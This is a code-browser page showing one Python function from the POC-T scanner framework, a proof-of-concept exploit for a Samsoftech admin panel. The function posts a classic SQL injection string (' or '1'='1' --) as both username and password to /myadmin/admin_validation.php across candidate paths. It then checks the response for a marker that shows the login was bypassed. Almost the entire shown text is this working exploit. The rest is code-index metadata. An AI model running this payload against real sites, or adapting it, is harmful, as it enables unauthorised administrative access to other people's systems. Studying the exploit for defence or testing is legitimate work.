hub / github.com/Xyntax/POC-T / poc

Function poc

script/samsoftech-admin-bypass.py:23–38
(url)

Source from the content-addressed store, hash-verified

def poc(url):
    # Default to http:// when the input carries no scheme.
    if '://' not in url:
        url = 'http://' + url
    payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
    data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
    for each in iterate_path(url):
        # Skip candidate paths that carry a query string.
        if '?' in each:
            continue
        target = each.rstrip('/') + '/myadmin/admin_validation.php'
        try:
            r = requests.post(target, data=data, timeout=15)
            # Response marker the script checks for.
            if 'form name="frmNextstep"' in r.content:
                return target
        except Exception:
            # Request errors are ignored; move on to the next path.
            pass
    return False

Callers

nothing calls this directly

Calls 1

iterate_path · Function · 0.90

Tested by

no test coverage detected